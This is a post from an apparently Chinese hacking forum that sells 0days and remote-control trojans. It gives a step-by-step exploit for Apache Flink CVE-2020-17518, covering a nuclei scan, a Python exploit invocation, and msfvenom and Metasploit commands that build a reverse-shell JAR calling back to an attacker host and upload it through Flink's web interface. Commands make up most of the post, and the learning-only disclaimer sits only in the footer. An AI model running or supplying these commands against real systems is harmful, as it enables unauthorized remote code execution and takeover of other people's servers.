[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
0day Today Exploit DB Official RSS Channel
Tor
Telegram联系我们
Shacker

POC Apache Flink

Shacker

Shacker已验证会员

黑客倉庫站長

贡献: 21%
JavaScript: 
## 漏洞概述
Apache Flink  恶意JAR包上传,导致任意命令执行,反弹shell

## 影响范围
```http
Flink < 1.11.3
Flink < 1.12.0
```

## POC
```bash
nuclei.exe -tags apache -t cves/ -stats -u http://test.com:8081
```

## EXP

1、Py脚本

```python
python CVE-2020-17518.py http://example.com:8081
```

2、MSF

```bash
#生成木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx  LPORT=4444 -f jar > test.jar

#监听端口
use exploit/multi/handler
set payload java/shell/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 4444
run
```

点击查看文件上传页面 -> 点击 Add 上传 jar 文件

## 参考链接

[CVE-2020-17519 & CVE-2020-17518 分析](https://xz.aliyun.com/t/8993?page=1)
 
Shacker
POC  CVE-2020-17518
Shacker
POC  Flink
点击展开...
好评 0 否决票
您必须登录或注册才可回复。
相似主题 热门帖子 查看更多

暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @Hack7er1949  网站地图Sitemap
后退
顶部